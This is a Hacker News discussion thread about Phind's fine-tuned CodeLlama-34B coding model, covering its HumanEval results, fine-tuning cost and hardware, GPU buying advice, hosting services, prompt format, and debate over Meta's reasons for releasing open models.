Simply put, AMD is going to have to get their shit together. NVIDIA was embraced by the AI community so long ago because CUDA isn't that tough to use. I haven't looked at AMD's solutions at all - in fact I don't even know what they call their version of CUDA - but I know one thing for certain is that the world cannot depend on a single company to supply the underlying technology for this technological revolution.

That's an easy way to a dystopian hellscape.

And the only reason we haven't seen open source foundational model training is, because as you said, the only significant player in the arena right now is NVIDIA.

Here's hoping Lisa Su is shifting priorities - and quickly.


You still need the data.

And eventually might mean 10 years.

4k took ages until it just worked. I even switched to the M1 for this


4k as in screen resolution? That was a thing for many many years before M1.


Of course but I still had laggy ui and issues when sharing my screen etc.

For example the gcp (Google cloud ui) became unusable while sharing in Ms teams.

Also good 4k displays/fast ones still had a fan build in.


It beat it on a specific subset of language


Thats still interesting, as finetunes for different languages can be made using similar methodologies.


I think it just highlights the utility of finetuning.

This is something big tech can still offer with proprietary models.


Are you planning to switch to programming-language optimized model inside Phind? So, if a user is asking for something related to Python, that the python-optimized model gets used?

If so:

The Object Pascal language is completely out of fashion, and the most non-hyped language there is. However, there are hundreds of thousands of active users of Delphi, FreePascal and Lazarus. And due to the language being stable for over 20 years, there also is a gigantic amount of highest-quality code available. As most of it is neither on Github nor StackOverflow, Pascal code is dramatically underrepresented in GPT3.5, GPT-4 - and therefore also in Phind.

I'd like to finally be able to use AI-assisted programming with Pascal.

In case you are interested in that, I would be willing to internally pay for the work to prepare a good dataset of high quality code with comments/context/prompts.

If you are not interested, is there any chance that you are going to release the code and toolchain used to fine-tune CodeLlama, so I could do it myself?


Yes, this is the direction we're heading towards! We're building a mixture of experts of different coding models that we will deploy for precisely this use case.


Nice!

I suppose that Pascal is not on your planned list of supported languages, right?


Why would it? Do you know how much it costs to finetune one of these models for such a niche language? I'm not just talking about the cost of training, but also the cost of acquiring data because there's much less data about niche languages.


96 x A100 hours for a finetune according to the article.

The cost of the dataset curation for a given language is hard to quantify as there are many unknowns. However, it seems perfectly crowdsourcable to volunteers.


A project like SETI@home should help these efforts I believe?


Maybe the stable horde could work it into the project.

https://stablehorde.net/


It certainly costs much less to the society to train for Pascal once than to make everyone burn CPU cycles running Python!


> Do you know how much it costs to finetune

Between 30-3000$, often in the 300$ range.


From their numbers 3 hours with 32 A100 80GBs.

From lambda cloud:

3 hours * 4 ~22$/hr for 8x A100 ~= $265

So yeah not too expensive even for a native fine tune (obviously this ignores all other costs other than the GPUs)


It's wild to me that the raw compute cost is so low.


Sweet Jesus, that is amazing.


Where are the troves of Pascal code? Also manuals, books, etc. The quality doesn't have to be great. You can label and generate more data once you have enough to bootstrap the model.


> I would be willing to internally pay for the work

What kind of budget do you think this will require?


Not much, I guess. It's basically writing some scripts that will take the code base of some of the available high quality pascal projects, and then depending on what is available extract/merge documentation available as PDF, PasDoc, RTF, .HLP or method/function source code comments.

I would assume that one of my devs could write the needed scripts in three weeks or so.

So, basically a budget of <$5000.

For me - due to missing competence - the actual challenge would be to get a sample on how training data should optimally look like (for example the Python training set), and someone doing the actual training. For a newbie to get up the required level of competence surely will take more than three weeks.


Wow, we're blown away by this response! We love helping the open source community however we can.

This model is only the beginning -- it's an early experiment and we'll have improvements next week.


Ive used GPT 4 for pretty much all of my programming needs and the convenience of a 20 dollar subscription taking care of everything and letting me use a LLM without having to set up any models or servers has been just so simple, is the 2 percent gain worth looking into running a local model again? I tried running a local model a couple months ago but the perfomance was bad. I know code llama came out very recently but does anyone have any thoughts on perfomance regardi g programming tasks compared to GPT


If all you care about is convenience, then anything cloud or SaaS will be better for you.


For me the use case is asking a local LLM questions about an invention I'm working on, as with ChatGPT I can't be confident the ideas don't make their way into the model. I'm able to run some 13B 5Q models, in my opinion the utility and complexity is somewhere between GPT3 and GPT3.5, which doesn't quite cut it for this purpose. That's not to say anything of the lacking coding abilities. I'm on the fence of getting a 3090. If I do so I think I'll set up a server on the PC so I can query the LLM from my phone just like one can use ChatGPT.


Personally I doubt that GPT-4 is really still at 67%.

I would love to see some head-to-head examples.

Is anyone hosting this somewhere that can be accessed for free right now?


I think for them it's about de-risking their business.


Glad to see open source models becoming competitive and thanks for sharing the model to community! Lepton AI has hosted this model here free for everyone to give it a try (and compare to the original CodeLlama 34B version): https://codellama.lepton.run API is also available at https://codellama.lepton.run/api/v1 (it's fully compatible with OpenAI's api, so just switching the `api_base` to the this url and all your existing openai client side code should continue working)


I see you're using [INST] tokens. Please don't do this -- this model was not trained in this format or to be a chat model.

Instead, it should be treated as a completions model (like text-davinci-003) and no system prompt should be provided.

Just tell it what you want.


Thanks for pointing out. We have now updated the prompt template to follow the format.


Hey, just an FYI, phind-codellama-34b-v2 was just released, which performs even better! Just letting you know in case you wanted to add the new model to the lepton chat you guys set up.


Hey, just an FYI, phind-codellama-34b-v2 was just released, which performs even better! Just letting you know in case you wanted to add the new model too!


Why is FB doing this. I am so perplexed. Like, I am still waiting for the "gotcha!". Purely to mess with MS?


It degrades Googles and OpenAis ability to monetize.

That alone is worth gold because tech is not a blue ocean anymore - neither from a market opportunity nor from an investor perspective. Your enemies loss is your benefit. They can’t use money they don’t make to mount attacks to dislodge customers, investors, mindshare from you.

Secondly it commoditizes AI. Zuck believes that his platforms ultimately will benefit if there is more content. Because his platforms sell the ability to show YOUR content over the rest, for coin. Just as with news/mobile games, driving the value of your content lower and lower by fostering the creation/supply of more of it is good for FB and bad for you. You have to advertise to rise above the noise. (And no it doesn’t really “affect users”) because they see the same amount of content (attention is finite), it’s entirely FBs discretion across all their surfaces what you see.

Disclosure: Ex FB but not specific insights into current developments.


A previous post here on HN [1] discussed the leak of the original LLaMA model and Stable Diffusion. The article points out that the open-source community's effort resulted in more innovation, and an ecosystem built up around these models leading to rapid adoption. That gives more control to the original authors of the model against their competitors. I think Meta has recognized this and wants to keep their lead going.

[1] https://news.ycombinator.com/item?id=35813322


They’re also already giving out millions of dollars in man hours in releasing and maintaining open source software, as well as lots of other much less used ML models. So they have an existing open source strategy and it makes sense to double down on this one since it’s clearly more impactful than a lot of the other ones


They’re end-users of AI, they’re not vendors selling AI. Giving it away for free is not a loss to them.


One possible explanation is to make PyTorch victory over TensorFlow/JAX even more apparent: with Google ceasing to release interesting open-source models, and Facebook / Meta continuing doing so (even if under a less permissive license than usual), it means that there's nothing interesting in the TensorFlow/JAX ecosystem, and a lot in the PyTorch one.

(context: I work for Google DeepMind, opinions are my own)


Another possible reason might be to attract and retain talent? Speculating wildly but I'd guess some top researchers would value having their work be the industry standard rather than internal.


Your speculation is pretty accurate afaik. Mark commented that releasing open source models is what is needed to retain the best so it is what they will do (paraphrasing) on his interview with Lex Friedman.


Hmm, but I feel like Jax/Pytorch interop is only getting better. Tensorflow abstraction has already firmly lost.


> Hmm, but I feel like Jax/Pytorch interop is only getting better

There's definitely some convergence. It's good. It still stands for a fact that most people do/think about PyTorch nowadays, not JAX (speaking as someone who likes JAX).


Phind did the fine-tuning, not Facebook.

This is actually an excellent demonstration of a good reason to open source something. Another company immediately made a dramatic improvement.

Now anyone from Facebook or any companies they have invested in can benefit from that improvement and information about how they did it. Facebook could even take this exact model and add a coding assistant into Messenger if they wanted (not that they are interested in that). Or apply it to other things.

OpenAI has a big lead. The most effective counter to that is actually to team up.


I think a smart company plans for what they see the future as holding, as opposed to optimizing for what maximizing gains in the short term. And text generation programs seem to be following near to the exact same path as image generation programs did after DALL-E.

So in the future we're probably not going to see any single centralized player, but rather a wide decentralization with many options. It seems in this future, providing a 'decentralization ready' to go package that people can use and deploy for all sorts of things is far smarter than blowing through billions of dollars (and goodwill) desperately trying to become a centralized behemoth when you have no moat, no network effect, and perhaps a temporary technical advantage at best.

And while OpenAI has blown through a bunch of good will going from Open-ForSociety-AI to Closed-ForProfit-AI, Facebook has simultaneously gained a bunch of good will. What this translates to is really difficult to even imagine, but it's certainly desirable. And really I think this intangible of good will is something many modern corporations don't give enough value to, and it's hurting them - catching more flies with honey than vinegar, and all that.


> Purely to mess with MS?

Unlikely as Microsoft is the preferred partner for Llama 2 [2]. It's not clear what Meta's end goal is, but large companies can loss lead investments to grab mind share then worry about Business models later, an approach which seems to be working well [2] where Meta went from not being in the leading AI companies conversation to being the company behind the models that most OSS innovation is happening around.

At the very least they've already created a strong brand around Llama whose eyes are watching their every release - which is invaluable reach that other companies could ever hope to dream of, making it easy to promote and gain instant traction for new Llama based products (like this).

[1] https://about.fb.com/news/2023/07/llama-2/

[2] https://news.ycombinator.com/item?id=35813322


My little theory is Microsoft actually learned a lesson from their experience going up against LAMP in the 90s. They got positively wrecked with their "Proprietary, $, closed-source Windows, IIS, ActiveX or whatever" approach.

They release of ton of AI stuff themselves and partner on things like this. They're also big backers/investors in OpenAI and their own proprietary products, of course.

I think they're taking that lesson and hedging their bets this time. It's like how a lot of corporations will donate to both political candidates (in the US) to guarantee they'll have access/influence regardless of how things shake out.


Facebook has had an AI research lab for the better half of a decade now. Their open release model worked well in the past and it seems to be working well with Llama too. That looks like the extent of it.

We should expect more FAANG-sized companied to do this, frankly. It's surprising to see people antipate a 'gotcha' considering how influental and transparent Pytorch was.


Given that LLMs might be a generation-defining technology it's certainly weird that one of the biggest public companies is giving theirs away for free.


They're actually not giving it away for free. At least not LLAMA v2. Once a product successfully monetizes and gains over a certain number of users, an official license from Meta has to be negotiated otherwise Meta could revoke usage of the model. At least that's roughly what the license for LLAMAv2 implies.


That's not quite right. The license never gets revoked. Once over a certain size, the company will not receive licenses to new versions/releases.


This is how I understand it too, and it's very interesting. In any case, if your company reaches that size, I'm sure you'll have replaced it with something else by that time. I'm confident many fully open-source, high-quality and specialized models will be available in the next years - even thanks to Meta. Whatever their strategy is, the models are on our machines, legally, and this is incredible.


But that clause pretty much only applies to mega companies like FB no?


Does FB care about any companies smaller than that? If they're Instagram-competitive-successful, FB can afford to buy them.


Yeah IIRC its something like 700m users. ie. meta gets to piggy back off any generational winners


The open research tradition has been open for many defining technology, most companies continued releasing for free even when it became clear this tech would be transformative (I think it was obvious by GPT-2).


Web browsers were also a generation-defining technology.


This would be more like Google giving away their search algorithm in 2000.


That would be it if it was OpenAI releasing GPT4. Facebook releasing Llama is like Google releasing Chrome.


If Facebook were to implement a language model inside the platform now it would raise a lot of privacy issues. By publishing free to use models they can rely on others to do the work of training the society into using such tools at mass scale. So by the time they adopt in in all their services there will be much less backlash.


Also, it's cheaper.

Not just for the engineer-hours, but for the endless VP/PM political meetings arguing over this approach or that.

Way cheaper to let the market decide, and then reincorporate the winner into their products. A winner which happens to already be based on a semi-compatible tech stack.


They're in the business of encouraging users to post content to get more eyeballs and therefore more ad revenue. So commoditising a way of generating a lot more content is in their interests.


This. I recall in their earnings report, they gave a similar answer, I.e the more this technology is made accessible, the better the content put on social media becomes. They also pointed out that any improvements made can be incorporated into their stack like what happened with open compute and PyTorch.


Why wouldn't they? It is their best strategy.

I didn't like them that much before, now I do.


> perplexed

Apt choice of word


This stuff is accelerating it alarming pace. I know of three or four off the shelf solutions to self host and run models now. I have learned so much and continue to learn about how this stuff works.


I don’t think it’s alarming I think it’s cool. It’s just autocomplete :)


Any recommendations for learning material?


The localllama subreddit has lots of content though mostly unstructured


TheBloke discord


What is alarming about it?


Congrats!

I've played with Phind a few times, and it's definitely one of the cooler products to come out of the LLM boom.


Great stuff - and training was so cheap too - it would have cost less than $200 on Runpod, and half that price on spot instances.

I guess it's time languages other than Python, especially niche ones, started collating their own language specific datasets.

Personally, I daydream about an Elixir specific LLM I could run locally, trained or fine tuned to respond in an idiomatic fashion, and plug into a tool like Cursor.so.

Are there any examples of the internal dataset used in the 80K instruction / answer pairs Phind used to tune this?


Glad this work is happening! That said, HumanEval as the current gold standard for benchmarking models is a crime. The dataset itself is tiny (around 150) examples and all the problems themselves aren’t really indicative of actual software engineering problems. Also, we’ve been able to get around 85% pass@1 on GPT-4 internally as of a couple weeks ago. It’s hard to say if they’ve contaminated the models with RLHF though. It still is exciting how close we’re getting with open source models but we’ve still got a decent amount of work to go!


Yes -- we're being careful with our claims here. This model is not yet necessarily a better coding model overall, but it's strong on Python.

We're working hard to use these advances to make models that are production ready. One such idea is to run a mixture of experts on various fine-tuned CodeLlamas.


I think the issue of test set contamination is important, but it’s academic - when a model contains a good enough distilled representation of arguably all the code out there, does it really matter whether it can generalise OOD?

Realistically how many of the practical use cases where it’ll be applied will be OOD? If you can take GPT4 there then you are either a genius or working on something extremely novel so why use GPT4 in the first place?

I understand the goal is for LLMs to get there, but the majority of practical applications just don’t need that.


> when a model contains a good enough distilled representation of arguably all the code out there, does it really matter whether it can generalise OOD?

If its contaminated by the test set being in the model’s training set, then the test is no longer (assuming it was in the first place) a valid measure of whether the model has “a good enough distilled representation of arguably all the code out there”.


One thing I’d be curious to see is how well this translates to things outside of HumanEval! How does it compare to using ChatGPT for example.


What would be the absolute top notch Nvidia card I should buy now, that would last long and would run the most (if not all) of bigger-end SotA models like CodeLlama or Stable Diffusion XL blazingly fast?

Also, should I buy multiple and bundle them, in case a single top card won't satisfy the above requirements?


it depends how much you're willing to spend.

You can get a H100 (80GB) for around 28-30k$, an A100 (40GB) for around 6-7k$, a 4090 (24GB) for 1.5-2k$.

You can build a normal pc with a 4090, otherwise you're in datacenter territory.

You can bundle up more GPUs.

You can decrease the precision of your models to get them to run on cards with less RAM.


Could I really buy a single A100 as a consumer? Any links for that?

And could I fit models bigger than 40GB into A100?


You can snag them on Ebay[0], the A100 with 40GB is ~$5000, the 80GB is like $13,000, good luck, hope it doesn’t break, since you’re not getting a warranty!

[0] https://www.ebay.com/sch/i.html?_nkw=a100+40gb


I'm seeing a bunch of results from China. I was under the impression it was illegal to sell A100 to China, so where are the chinese sellers getting these cards?


As a consumer isn’t the A100 costing you unnecessary “cloud tax”


A 4060 Ti with 16GB memory costs around $700-800 over here, can I connect two of these to get 32 GB memory to run the bigger models (13B stock or 30B quantized)?


One additional caveat worth considering... a lot of LLM computation is often memory bandwidth bound. The 4060 Ti is infamous for how deeply Nvidia cut the memory system. The 3060 Ti had a 256-bit bus that was capable of 448GB/s of memory bandwidth. The 4060 Ti has a paltry 128-bit bus that can only do 288GB/s, about 64% of the memory bandwidth of the previous generation.

For comparison, an RTX 3090 has 935GB/s of memory bandwidth. As the other person mentioned, that would likely be a much better card if you can find a used one for a reasonable price... but that's just my opinion.


Thanks for the info!


A 3090 with 24GB of vram is $650 used on Facebook where I live. I think that would be a better card as you can use nvlink.

Alternatively, the 4000 series cards rely on the PCI express lanes for linking, so if you want to get the benefits of linking the 4000 series cards as a consumer you’ll want a Threadripper or even maybe an EPYC CPU/motherboard combo.


Have a play on vast.ai first. I don’t know about these models but for training smaller models the humble 3090 packs a punch.


What kind of hardware does it take to fine tune such a model? I've been day dreaming about self-play with these models. Generate 100 leetcode problems. One variant writes test cases, one variant writes code. Make the loss for the tester high if there are bugs (maybe compare to using a fuzzer on the program or have multiple tester variants generating large test suites). The coder variant has loss related to number of failed test cases or retries or something.

Then, just keep running that in a loop, generating, testing, developing.

Is it possible to self-train like this, or attempt to do so, on commodity hardware? Could I make a meaningful change to 34B sized models if I had one or two 4090s? (Or something for a similar, few thousand dollar, price point).


The AI race to zero is accelerating with Meta who has already won the race. Fuelling an ecosystem of downloadable AI models released for $0 for free for anyone can use, unlike the gate-kept cloud-only AI models which OpenAI, Anthropic and Google are trying hard to compete against Llama which eventually the free AI models will catch up to GPT-4 sooner.

Cloud-only models cannot compete with free and they continue to lose hundreds of thousands of dollars a day, especially OpenAI getting disrupted by the $0 free AI model ecosystem thanks to Meta.

It is clear that the REAL 'Open AI' has always been Meta. Funny how many here dismissed Meta a year ago and since the days of the ConvNet hype, they have been releasing their AI research more frequently than OpenAI is trying to update their GPT model.

For Meta, they are already at the finish line and thanks to them you have CodeLlama; accelerating and driving inflated developer salaries to the bottom. No need for expensive, tired seniors and inexperienced juniors both doing the same developer job worse than two engineers with CodeLlama who can do the same work faster for less.

The future is hiring less developers but utilising AI and not hiring more with extreme inflated salaries.


Increased output leads to increased demand. If last week I could pump out 3 solid PRs that fixed issues in our product, then it will be expected that I pump out 20 PRs using AI in a week. Information Engineers are going to be in more demand than ever, the title is just going to change to Platform Engineering because that's the level we will be expected to operate at with the new tooling. This is why there's a multitude of LLM frontends being released every week. That is no longer skilled labor and an elementary school child with enough time can do it. But building an entire platform that can scale and has 5 9's uptime?

When an AI can do that, then we panic.


So about 2 weeks ?


The future is hiring less developers but utilising AI and not hiring more with extreme inflated salaries.

How about the future is hiring less of everyone ?


Coding is exhausting and if a computer can do it I’m fine with that. Coding I think (or what got me into it) is about getting amazing machines to work not building bloatware for a pay check. If AI can do the boring fine details and we get to spend more of time on ideas or something like that I’m all for it. Let’s figure out new jobs to do instead:)


Assuming more compute is better, free models will always be a step behind in speed/quality and a step ahead in privacy.


Yes, on our local machines. But on specialized remote computers, I guess it will be fast, accurate, and cheaper.


Yes, on remote cloud computers it will be fast, but then you are just changing who you decide to trust.


As if the engineers were causing income inequality.


Sounded like some copium blended with sarcasm to be honest.


Sounds like schadenfreude.


Perhaps it is because it is true and both of you are showing signs of great denial.

Engineers will be replaced by those that use AI and it will only accelerate and there will be less of them hired.


> Engineers will be replaced by those that use AI

So 10x engineers will replace normal engineers? Although this seems plausible, the advent of the 10 or 100x engineer isn't something new (and it didn't put millions of engineers out of work, although it created the biggest corporations to ever exist).


Engineers will be replaced by those that use AI

By that time not only engineers will get replaced. What do you do if I may ask ?


There is only one thing that you can do and it is just to accelerate it.


No, I meant what do you do for a living.


Meta isn't being "heroic" or "winning a long fought battle" or whatever analogy you want to use in order to prop them up and make them look better than they are.

Do I appreciate the free weights from them? Yes. Did they contribute to a genocide in Myanmar? Also yes.

Take the weights and move on. They don't deserve the excessive praise. They aren't a rock band. They are an advertising company.


> Meta isn't being "heroic" or "winning a long fought battle" or whatever analogy you want to use in order to prop them up and make them look better than they are.

The AI race is real and the AI research Meta has done deserves praise, as well as their engineering contributions.

> Do I appreciate the free weights from them? Yes. Did they contribute to a genocide in Myanmar? Also yes.

So does that mean we shouldn't use their technologies? If you are looking for big tech companies that have no skeletons that are also significantly progressing the field of AI, then you're going to be very disappointed.

> Take the weights and move on. They don't deserve the excessive praise. They aren't a rock band. They are an advertising company.

Perhaps it is you that needs to move on, unless you will actually do something about it?


I don't know why you so-called experts and self proclaimed intelligent people never shares the complete steps, requirement info to test, debug any code for new comers. Do you really feels that new comers and less knowledge person never can good inputs? I myself struggled to install web ui of oobabooga, downloaded two models i.e. one from main branch which hanged the pc and second 4bit-32g-actorder, which failed by 'AsyncRequest' object has no attribute '_json_response_data'. Now I am clueless and disappointed by un-human behavior of you people.


How to use this or gpt 4 for day to day code? I want to feed my code repo into it and generate/fix/explain code. Is the context windows size going to block me. Has anyone been doing it, with llama 2 models ?


https://cursor.sh is the best I've seen so far. It uses GPT-4. I'm sure someone will hook it up to code llama soon.


Thanks. Is there any open source hosted solution like cursor that can use the Llama models ?


I made some notes recently on the various code helpers/editors available, both SaaS/services-based and ones that are more BYOB: https://llm-tracker.info/books/llms/page/code-assistants


Does this page have a bunch of blue-text runs that aren't links?


Yes. I think it's just a highlight. The HTML doesn't look like it's trying to be a link or anything.


it's not supposed to be a link, but I see how it'd be confusing. will fix


Quite promising, and at last it looks like we have pretty decent models that can run locally. It is not perfect; still they fail in the first go to provide a correct answer to stuff like "How do I read a csv file in Julia". I wish there was more finetuning towards less popular than python-javascript languages. They seem like they can be a great tool to help learn new languages. We are not there yet, but hopefully we will be soon.


This is impressive, so congratulations. I also think that this is a great example of how open source can simply lead to faster and better acceleration.


Their pricing page says 30 uses per day of (GPT-4). What exactly does that mean, they send my query to Open AI's GPT 4 and return the result?


Their model takes your query, then issues a web search, evals the result, considers follow up questions and compiles a prompt with the right context that is sent to GPT-4, you are then seeing the output of that.


nice result! I've been looking into benchmarking models recently, it would be interesting to run your model through on the same battery of tests [https://github.com/emrgnt-cmplxty/zero-shot-replication/blob...]


It's amazing to see how rapidly things are moving.

You can try out CodeLlama-34B on Anyscale Endpoints (an LLM inference API we're building here at Anyscale for open source LLMs).

https://app.endpoints.anyscale.com/


This looks like it might be neat but it has a pretty sparse intro page and then the email signup goes straight into stripe checkout - is there any more info about the service anywhere? Like which models are available, or more pricing info?


Thanks for the feedback, we'll improve the landing page!

The models (and current prices) right now are - Llama-2-7B ($0.25 / million tokens) - Llama-2-13B ($0.50 / million tokens) - Llama-2-70B ($1 / million tokens) - Code Llama ($1 / million tokens)


Awesome, thanks! I've been wanting exactly this service.


I had the same question. Being thrown into a payment page right after providing your email is very jarring. I don't want to pay for a product without even giving it a spin.


From the FAQ:

> What rights do you claim to my queries?

> During the alpha release, we may use your inputs and outputs to improve the service. In a future release, we may provide the ability to opt out of certain data uses.

I understand that you are in alpha, but paying without any privacy guarantees is a little hard to accept right now.

Otherwise your service seems really nice, I'm sure a lot of people have been waiting for something like this. Any ETA on the opt-out and further clarification on the matter?

Thank you.


So for huge log files would the entire thing be feed in with the offending lines of previous log files identified files in 4096 chunked tokens? Any one got a better workflow for training based on the above scenario? These log files are multiple MBs within a few minutes from the Android kernel.


For anyone who is using ollama to run these models, how do I give it prompts with newlines?


Totally out of my depth here but is there any chance that this could be added to something like Ollama and run on a 32gb or 64gb M series Mac in due course? I’m currently running base CodeLlama in this manner but it’s the 7b variant.


Looks like it's available: https://ollama.ai/library/phind-codellama/tags

(I don't have a Mac, so I can't say whether/how well it works.)


I tried out the 7B one last night and wasn’t impressed. When asking to write in Python it correctly can write regex to parse a date but when you ask it the same but in TypeScript for Node.js it fails to do so


Well, 7B ≪ 34B.


I built a chatbot that runs in the browser with WebAssembly and WebGPU. How does it run for you: https://chat.palapa.ai


That’s good and all but GPT4 can do all languages, not just 2-3


How hard is it to do fine tuning? I thought it would be cool to tune one to be good at debating and changing peoples minds about pickleball.


If you're creating an AI to dissuade people from pickleball then this is truly AI alignment promised land.

If, however, your AI is arguing in favor of it, then we have truly entered the age of renegade AI.


How come you no like?


Did you use the same pass@1 generation method as in the code llama paper (greedy decoding)? I couldn't find this in the blog post.


We used sampling with temperature=0.1. Reproduction details can be found on the Huggingface model card: https://huggingface.co/Phind/Phind-CodeLlama-34B-v1


Got it, thanks - and thanks for the model! I'd be interested in the results if anyone benchmarks without sampling.

Edit: it could also be misleading to directly compare humaneval pass@1 against codellama without the same generation methodology. (possibly against GPT-4, also, but I don't know their methodology).


Does this mean Phind Pro might become cheaper?


This is wonderful news. Maybe next a fine tune based on OpenAI’s function API, which I consider their killer app.


At this point we should be praying that the next competing model be called Winamp to come full circle.


what hardware could one run this locally on? probably need 3090 etc right?

finally a reason to upgrade from my m1 max


34B is basically an exact fit for a 3090, when quantized to 4 bits.


maybe worth noting that depending on specifics a 3090 isn't necessarily a strict upgrade over an M1 max. While a 3090 will be faster on any model it can run, an M1 with 32GB of ram or more can load models which a 3090 cannot


I tried using Alibaba Cloud servers to train my model, but it seems very expensive.


Could you please add the prompt format to the model card, or at least here?


The model card is intended to help reproduce the HumanEval results, which we've achieved with no prompt.

However, the model is instruction-tuned to follow completions (not chats). Simply tell it what you want and it should work.


Yeah but I assume it has a prompt format, for example CodeLlama34B Instruct the prompt format is

[INST] Write a function in Python that prints HelloWorld [/INST]


Nope, just ask your question. It's not chat-tuned the same way as CodeLlama34B Instruct.


Interesting. That seems a pretty odd choice. Without a prompt format (like almost all instruction finetunes have) the model might continue your instruction instead of answering the instruction, since it does not have a delimiter for where the instruction ends and the response begins.


This is an early experiment that we did in just a few hours. We'll have much better models in just a few days, stay tuned :)


What would the hardware requirement for fine-tuning a Llama 2 ?


We didn't want to use LoRA to maximize quality, so we used 32 A100-80GB with a sequence length of 4096. It's possible to do a native fine-tune on as little as 8 A100-80GB with DeepSpeed Zero 3, but it will take longer.

With LoRA you can probably get away with just a few 4090s.


Is the dataset open source?


> proprietary dataset

This reads more like advertising copy than an HN article.


Can you suggest better terminology? It seems normal to me.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: